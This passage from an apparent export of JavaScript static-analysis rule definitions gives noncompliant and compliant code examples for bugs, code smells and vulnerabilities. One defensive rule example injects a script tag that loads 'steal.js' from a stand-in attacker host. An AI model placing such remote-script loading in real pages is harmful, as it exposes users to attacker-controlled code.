<code>break<\/code>.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1994","repo":"javascript","name":"\"for\" loop increment clauses should modify the loops' counters","htmlDesc":"<p>It can be extremely confusing when a <code>for<\/code> loop's counter is incremented outside of its increment clause. In such cases, the increment\nshould be moved to the loop's increment clause if at all possible.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (i = 0; i &lt; 10; j++) {  \/\/ Noncompliant\n  \/\/ ...\n  i++;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (i = 0; i &lt; 10; i++, j++) {\n  \/\/ ...\n}\n<\/pre>\n<p>Or<\/p>\n<pre>\nfor (i = 0; i &lt; 10; i++) {\n  \/\/ ...\n  j++;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2123","repo":"javascript","name":"Values should not be uselessly incremented","htmlDesc":"<p>A value that is incremented or decremented and then not stored is at best wasted code and at worst a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar i = 0;\ni = i++; \/\/ Noncompliant; i is still zero\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar i = 0;\ni++;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2138","repo":"javascript","name":"\"undefined\" should not be assigned","htmlDesc":"<p><code>undefined<\/code> is the value you get for variables and properties which have not yet been created. Use the same value to reset an existing\nvariable and you lose the ability to distinguish between a variable that exists but has no value and a variable that does not yet exist. 
Instead,\n<code>null<\/code> should be used, allowing you to tell the difference between a property that has been reset and one that was never created.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = undefined;  \/\/ Noncompliant\n\/\/ ...\n\nif (myObject.lname == undefined) {\n  \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n  \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = null;\n\/\/ ...\n\nif (myObject.lname == undefined) {\n  \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n  \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2208","repo":"javascript","name":"Wildcard imports should not be used","htmlDesc":"<p>On the principle that clearer code is better code, you should explicitly <code>import<\/code> the things you want to use in a module. Using\n<code>import *<\/code> imports everything in the module, and runs the risk of confusing maintainers. Similarly, <code>export * from \"module\";<\/code>\nimports and then re-exports everything in the module, and runs the risk of confusing not just maintainers but also users of the module.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nimport * as Imported from \"aModule\";  \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2228","repo":"javascript","name":"Console logging should not be used","htmlDesc":"<p>Debug statements are always useful during development. 
But include them in production code - particularly in code that runs client-side - and you\nrun the risk of inadvertently exposing sensitive information, slowing down the browser, or even erroring-out the site for some users.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(password_entered); \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n  <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2234","repo":"javascript","name":"Parameters should be passed in the correct order","htmlDesc":"<p>When the names of arguments in a function call match the names of the function parameters, it contributes to clearer, more readable code. However,\nwhen the names match, but are passed in a different order than the function parameters, it indicates a mistake in the parameter order which will\nlikely lead to unexpected results.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n  return divisor\/dividend;\n}\n\nfunction doTheThing() {\n  var divisor = 15;\n  var dividend = 5;\n\n  var result = divide(dividend, divisor);  \/\/ Noncompliant; operation succeeds, but result is unexpected\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n  return divisor\/dividend;\n}\n\nfunction doTheThing() {\n  var divisor = 15;\n  var dividend = 5;\n\n  var result = divide(divisor, dividend);\n  \/\/...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2251","repo":"javascript","name":"A \"for\" loop update clause should move the counter in the right direction","htmlDesc":"<p>A <code>for<\/code> loop with a stop condition that can never be reached, such as one with a counter that moves in the wrong 
direction, will run\ninfinitely. While there are occasions when an infinite loop is intended, the convention is to construct such loops as <code>while<\/code> loops. More\ntypically, an infinite <code>for<\/code> loop is a bug. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 0; i &lt; strings.length; i--) { \/\/ Noncompliant;\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 0; i &lt; strings.length; i++) {\n  \/\/...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/zYEzAg\">CERT, MSC54-J.<\/a> - Avoid inadvertent wrapping of loop counters <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2392","repo":"javascript","name":"Variables should be defined in the blocks where they are used","htmlDesc":"<p>A variable that is declared at function scope, but only used inside a single block should be declared in that block, and variables that are\ndeclared inside a block but used outside of it (which is possible with a <code>var<\/code>-style declaration) should be declared outside the block.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething(a, b) {\n  var i;  \/\/ Noncompliant; should be declared in if-block\n  if (a &gt; b) {\n    i = a;\n    console.log(i);\n    var x = a - b;  \/\/ Noncompliant; should be declared outside if-block\n  }\n\n  if (a &gt; 4) {\n   console.log(x);\n  }\n\n  return a+b;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(a, b) {\n  var x = a - b;\n\n  if (a &gt; b) {\n    var i = a;\n    console.log(i);\n  }\n\n  if (a &gt; 4) {\n   console.log(x);\n  }\n\n  return a+b;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2424","repo":"javascript","name":"Built-in objects should not be overridden","htmlDesc":"<p>Overriding an object changes its behavior and could potentially 
impact all code using that object. Overriding standard, built-in objects could\ntherefore have broad, potentially catastrophic effects on previously-working code.<\/p>\n<p>This rule detects overrides of the following native objects:<\/p>\n<ul>\n  <li> Fundamental objects - Object, Function, Boolean, Symbol, Error, EvalError, InternalError, RangeError, ReferenceError, SyntaxError, TypeError,\n  URIError <\/li>\n  <li> Numbers and dates - Number, Math, Date <\/li>\n  <li> Text processing - String, RegExp <\/li>\n  <li> Indexed collections - Array, Int8Array, Uint8Array, Uint8ClampedArray, Int16Array, Unit16Array, Int32Array, Uint32Array, Float32Array,\n  Float64Array <\/li>\n  <li> Keyed collections - Map, Set, WeakMap, WeakSet <\/li>\n  <li> Structured data - ArrayBuffer, DataView, JSON <\/li>\n  <li> Control abstraction objects - Promise <\/li>\n  <li> Reflection - Reflect, Proxy <\/li>\n  <li> Internationalization - Intl <\/li>\n  <li> Non-standard objects - Generator, Iterator, ParallelArray, StopIteration <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2427","repo":"javascript","name":"The base should be provided to \"parseInt\"","htmlDesc":"<p>The <code>parseInt<\/code> function has two versions, one that takes a base value as a second argument, and one that does not. Unfortunately using\nthe single-arg version can result in unexpected results on older browsers. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nparseInt(\"010\");  \/\/ Noncompliant; pre-2013 browsers may return 8\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nparseInt(\"010\", 10);\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2432","repo":"javascript","name":"Setters should not return values","htmlDesc":"<p>Functions declared with the <code>set<\/code> keyword will automatically return the values they were passed. 
Thus any value explicitly returned from\na setter will be ignored, and explicitly returning a value is an error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar person = {\n  \/\/ ...\n  set name(name) {\n    this.name = name;\n    return 42;  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar person = {\n  \/\/ ...\n  set name(name) {\n    this.name = name;\n  }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2508","repo":"javascript","name":"The names of model properties should not contain spaces","htmlDesc":"<p>When using the Backbone.js framework, the names of model attributes should not contain spaces. This is because the Events object accepts\nspace-delimited lists of events, so an attributes with spaces in the names could be misinterpreted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n        defaults: {\n            'first name': 'Bob',      \/\/ Noncompliant\n            'birth date': new Date()  \/\/ Noncompliant\n        },\n    });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n        defaults: {\n            firstName: 'Bob',\n            birthDate: new Date()\n        },\n    });\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2583","repo":"javascript","name":"Conditionally executed blocks should be reachable","htmlDesc":"<p>Conditional expressions which are always <code>true<\/code> or <code>false<\/code> can lead to dead code. 
Such code is always buggy and should never\nbe used in production.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = false;\nif (a) { \/\/ Noncompliant\n  doSomething(); \/\/ never executed\n}\n\nif (!a || b) { \/\/ Noncompliant; \"!a\" is always \"true\", \"b\" is never evaluated\n  doSomething();\n} else {\n  doSomethingElse(); \/\/ never executed\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2589","repo":"javascript","name":"Boolean expressions should not be gratuitous","htmlDesc":"<p>If a boolean expression doesn't change the evaluation of the condition, then it is entirely unnecessary, and can be removed. 
If it is gratuitous\nbecause it does not match the programmer's intent, then it's a bug and the expression should be fixed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = true;\nif (a) { \/\/ Noncompliant\n  doSomething();\n}\n\nif (b &amp;&amp; a) { \/\/ Noncompliant; \"a\" is always \"true\"\n  doSomething();\n}\n\nif (c || !a) { \/\/ Noncompliant; \"!a\" is always \"false\"\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\na = true;\nif (foo(a)) {\n  doSomething();\n}\n\nif (b) {\n  doSomething();\n}\n\nif (c) {\n  doSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2611","repo":"javascript","name":"Untrusted content should not be included","htmlDesc":"<p>Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. 
For that reason, this\nrule raises an issue for each non-relative URL.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction include(url) {\n  var s = document.createElement(\"script\");\n  s.setAttribute(\"type\", \"text\/javascript\");\n  s.setAttribute(\"src\", url);\n  document.body.appendChild(s);\n}\ninclude(\"http:\/\/hackers.com\/steal.js\")  \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/829\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"domainsToIgnore","htmlDesc":"Comma-delimited list of domains to ignore. Regexes may be used, e.g. (.*\\.)?example.com,foo.org","type":"STRING"}],"type":"VULNERABILITY"},{"key":"javascript:S2688","repo":"javascript","name":"\"NaN\" should not be used in comparisons","htmlDesc":"<p><code>NaN<\/code> is not equal to anything, even itself. Testing for equality or inequality against <code>NaN<\/code> will yield predictable results,\nbut probably not the ones you want. <\/p>\n<p>Instead, the best way to see whether a variable is equal to <code>NaN<\/code> is to use <code>Number.isNaN()<\/code>, since ES2015, or (perhaps\ncounter-intuitively) to compare it to itself. 
Since <code>NaN !== NaN<\/code>, when <code>a !== a<\/code>, you know it must equal <code>NaN<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a = NaN;\n\nif (a === NaN) {  \/\/ Noncompliant; always false\n  console.log(\"a is not a number\");  \/\/ this is dead code\n}\nif (a !== NaN) { \/\/ Noncompliant; always true\n  console.log(\"a is not NaN\"); \/\/ this statement is not necessarily true\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (Number.isNaN(a)) {\n  console.log(\"a is not a number\");\n}\nif (!Number.isNaN(a)) {\n  console.log(\"a is not NaN\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7AEqAQ\">CERT, NUM07-J.<\/a> - Do not attempt comparisons with NaN <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2692","repo":"javascript","name":"\"indexOf\" checks should not be for positive numbers","htmlDesc":"<p>Most checks against an <code>indexOf<\/code> call against a string or array compare it with -1 because 0 is a valid index. 
Any checks which look for\nvalues &gt;0 ignore the first element, which is likely a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") &gt; 0) { \/\/ Noncompliant\n  \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") &gt; 0 { \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") &gt;= 0) {\n  \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") &gt; -1) {\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2714","repo":"javascript","name":"Element type selectors should not be used with class selectors","htmlDesc":"<p>Using element type in class selectors is slower than using only the class selector.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $products = $(\"div.products\");    \/\/ Noncompliant - slow\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $products = $(\".products\");    \/\/ Compliant - fast\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2715","repo":"javascript","name":"\"find\" should be used to select the children of an element known by id","htmlDesc":"<p>The use of <code>find<\/code> allows <code>document.getElementById()<\/code> to be used for the top-level selection, and saves the jQuery Sizzle\nengine for where it's really needed. 
That makes the query faster, and your application more responsive.<\/p>\n<p>From the jQuery documentation:<\/p>\n<blockquote>\n  <p>Beginning your selector with an ID is always best.<\/p>\n  <p>The <code>.find()<\/code> approach is faster because the first selection is handled without going through the Sizzle selector engine \u2013 ID-only\n  selections are handled using <code>document.getElementById()<\/code>, which is extremely fast because it is native to the browser.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $productIds = $(\"#products div.id\"); \/\/ Noncompliant - a nested query for Sizzle selector engine\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $productIds = $(\"#products\").find(\"div.id\"); \/\/ Compliant - #products is already selected by document.getElementById() so only div.id needs to go through Sizzle selector engine\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2757","repo":"javascript","name":"\"=+\" should not be used instead of \"+=\"","htmlDesc":"<p>The use of operators pairs (<code>=+<\/code> or <code>=-<\/code>) where the reversed, single operator was meant (<code>+=<\/code> or <code>-=<\/code>)\nwill compile and run, but not produce the expected results.<\/p>\n<p>This rule raises an issue when <code>=+<\/code> and <code>=-<\/code> are used without any space between the two operators and when there is at least\none whitespace after.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar target =-5;\nvar num = 3;\n\ntarget =- num;  \/\/ Noncompliant; target = -3. 
Is that really what's meant?\ntarget =+ num; \/\/ Noncompliant; target = 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar target = -5;\nvar num = 3;\n\ntarget = -num;  \/\/ Compliant; intent to assign inverse value of num is clear\ntarget += num;\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2770","repo":"javascript","name":"Deprecated jQuery methods should not be used","htmlDesc":"<p>Deprecation is a warning that a method has been superseded, and will eventually be removed. The deprecation period allows you to make a smooth\ntransition away from the aging, soon-to-be-retired technology.<\/p>\n<p>This rule raises an issue when any of the following methods is used:<\/p>\n<ul>\n  <li> <code>.andSelf()<\/code> <\/li>\n  <li> <code>.context<\/code> <\/li>\n  <li> <code>.die()<\/code> <\/li>\n  <li> <code>.error()<\/code> <\/li>\n  <li> <code>jQuery.boxModel<\/code> <\/li>\n  <li> <code>jQuery.browser<\/code> <\/li>\n  <li> <code>jQuery.sub()<\/code> <\/li>\n  <li> <code>jQuery.support<\/code> <\/li>\n  <li> <code>.live()<\/code> <\/li>\n  <li> <code>.load()<\/code> <\/li>\n  <li> <code>.selector<\/code> <\/li>\n  <li> <code>.size()<\/code> <\/li>\n  <li> <code>.toggle()<\/code> <\/li>\n  <li> <code>.unload()<\/code> <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2817","repo":"javascript","name":"Web SQL databases should not be used","htmlDesc":"<p>The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some\nbrowsers. 
(It is not supported in Firefox or IE.)<\/p>\n<p>Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar db = window.openDatabase(\"myDb\", \"1.0\", \"Personal secrets stored here\", 2*1024*1024);  \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n  <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities\">OWASP Top Ten 2013 Category A9<\/a> - Using\n  Components with Known Vulnerabilities <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2819","repo":"javascript","name":"Cross-document messaging domains should be carefully restricted","htmlDesc":"<p>HTML5 adds the ability to send messages to documents served from other domains. 
According to the specification:<\/p>\n<blockquote>\n  Authors should not use the wildcard keyword (\n  <code>*<\/code>) in the\n  <code>targetOrigin<\/code> argument in messages that contain any confidential information, as otherwise there is no way to guarantee that the message\n  is only delivered to the recipient to which it was intended.\n<\/blockquote>\n<p>To mitigate the risk of sending sensitive information to a document served from a hostile or unknown domain, this rule raises an issue each time\n<code>Window.postMessage<\/code> is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myWindow = document.getElementById('myIFrame').contentWindow;\nmyWindow.postMessage(message, \"*\"); \/\/ Noncompliant; how do you know what you loaded in 'myIFrame' is still there?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2870","repo":"javascript","name":"\"delete\" should not be used on arrays","htmlDesc":"<p>The <code>delete<\/code> operator can be used to remove a property from any object. Arrays are objects, so the <code>delete<\/code> operator can be\nused here too, but if it is, a hole will be left in the array because the indexes\/keys won't be shifted to reflect the deletion. 
<\/p>\n<p>The proper method for removing an element at a certain index would be:<\/p>\n<ul>\n  <li> <code>Array.prototype.splice<\/code> - add\/remove elements from the the array <\/li>\n  <li> <code>Array.prototype.pop<\/code> - add\/remove elements from the end of the array <\/li>\n  <li> <code>Array.prototype.shift<\/code> - add\/remove elements from the beginning of the array <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\ndelete myArray[2];  \/\/ Noncompliant. myArray =&gt; ['a', 'b', undefined, 'd']\nconsole.log(myArray[2]); \/\/ expected value was 'd' but output is undefined\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\n\/\/ removes 1 element from index 2\nremoved = myArray.splice(2, 1);  \/\/ myArray =&gt; ['a', 'b', 'd']\nconsole.log(myArray[2]); \/\/ outputs 'd'\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2873","repo":"javascript","name":"Calls should not be made to non-callable values","htmlDesc":"<p>The fact that JavaScript is not a strongly typed language allows developers a lot of freedom, but that freedom can be dangerous if you go too far\nwith it. <\/p>\n<p>Specifically, it is syntactically acceptable to invoke any expression as though its value were a function. 
But a <code>TypeError<\/code> may be\nraised if you do.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfoo = 1;\nfoo();   \/\/ Noncompliant; TypeError\n\nfoo = undefined;\nfoo();  \/\/ Noncompliant; TypeError\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2898","repo":"javascript","name":"\"[type=...]\" should be used to select elements by type","htmlDesc":"<p>While <code>:&lt;element_type&gt;<\/code> and <code>[type=\"&lt;element_type&gt;\"]<\/code> can both be used in jQuery to select elements by their\ntype, <code>[type=\"&lt;element_type&gt;\"]<\/code> is far faster because it can take advantage of the native DOM <code>querySelectorAll()<\/code> method\nin modern browsers. <\/p>\n<p>This rule raises an issue when following selectors are used:<\/p>\n<ul>\n  <li> <code>:checkbox<\/code> <\/li>\n  <li> <code>:file<\/code> <\/li>\n  <li> <code>:image<\/code> <\/li>\n  <li> <code>:password<\/code> <\/li>\n  <li> <code>:radio<\/code> <\/li>\n  <li> <code>:reset<\/code> <\/li>\n  <li> <code>:text<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar input = $( \"form input:radio\" ); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar input = $( \"form input[type=radio]\" ); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2990","repo":"javascript","name":"The global \"this\" object should not be used","htmlDesc":"<p>When the keyword <code>this<\/code> is used outside of an object, it refers to the global <code>this<\/code> object, which is the same thing as the\n<code>window<\/code> object in a standard web page. This could be confusing to maintainers. 
Instead, simply drop the <code>this<\/code>, or replace it\nwith <code>window<\/code>; it will have the same effect and be more readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthis.foo = 1;   \/\/ Noncompliant\nconsole.log(this.foo); \/\/ Noncompliant\n\nfunction MyObj() {\n  this.foo = 1; \/\/ Compliant\n}\n\nMyObj.func1 = function() {\n  if (this.foo == 1) { \/\/ Compliant\n    \/\/ ...\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfoo = 1;\nconsole.log(foo);\n\nfunction MyObj() {\n  this.foo = 1;\n}\n\nMyObj.func1 = function() {\n  if (this.foo == 1) {\n    \/\/ ...\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2999","repo":"javascript","name":"\"new\" operators should be used with functions","htmlDesc":"<p>The <code>new<\/code> keyword should only be used with objects that define a constructor function. Use it with anything else, and you'll get a\n<code>TypeError<\/code> because there won't be a constructor function for the <code>new<\/code> keyword to invoke.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyClass() {\n  this.foo = 'bar';\n}\n\nvar someClass = 1;\n\nvar obj1 = new someClass;    \/\/ Noncompliant;\nvar obj2 = new MyClass();    \/\/ Noncompliant if considerJSDoc parameter set to true. 
Compliant when considerJSDoc=false\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @constructor\n *\/\nfunction MyClass() {\n  this.foo = 'bar';\n}\n\nvar someClass = function(){\n  this.prop = 1;\n}\n\nvar obj1 = new someClass;  \/\/ Compliant\nvar obj2 = new MyClass();  \/\/ Compliant regardless of considerJSDoc value\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[{"key":"considerJSDoc","htmlDesc":"Consider only functions with @constructor tag as constructor functions","defaultValue":"false","type":"BOOLEAN"}],"type":"BUG"},{"key":"javascript:S3001","repo":"javascript","name":"\"delete\" should be used only with object properties","htmlDesc":"<p>The semantics of the <code>delete<\/code> operator are a bit tricky, and it can only be reliably used to remove properties from objects. Pass\nanything else to it, and you may or may not get the desired result.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x  = 1;\ndelete x;       \/\/ Noncompliant\n\nfunction foo(){\n  ...\n}\n\ndelete foo;  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = {\n  x:1,\n  foo: function(){\n  ...\n  }\n};\ndelete obj.x;\ndelete obj.foo;\n\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3358","repo":"javascript","name":"Ternary operators should not be nested","htmlDesc":"<p>Just because you <em>can<\/em> do something, doesn't mean you should, and that's the case with nested ternary operations. Nesting ternary operators\nresults in the kind of code that may seem clear as day when you write it, but six months later will leave maintainers (or worse - future you)\nscratching their heads and cursing.<\/p>\n<p>Instead, err on the side of clarity, and use another line to express the nested operation as a separate statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction getTitle(p) {\n  return p.gender == Person.MALE ? \"Mr. \" : p.isMarried() ? \"Mrs. \" : \"Miss \" + p.getLastName();  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction getTitle(p) {\n  var honorific = p.isMarried() ? \"Mrs. \" : \"Miss \";\n  return p.gender == Person.MALE ? \"Mr. \" : honorific + p.getLastName();\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3500","repo":"javascript","name":"Attempts should not be made to update \"const\" variables","htmlDesc":"<p>Variables declared with <code>const<\/code> cannot be modified. Unfortunately, attempts to do so don't always raise an error; in a non-ES2015\nenvironment, such an attempt might simply be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst pi = \"yes, please\";\npi = 3.14;  \/\/ 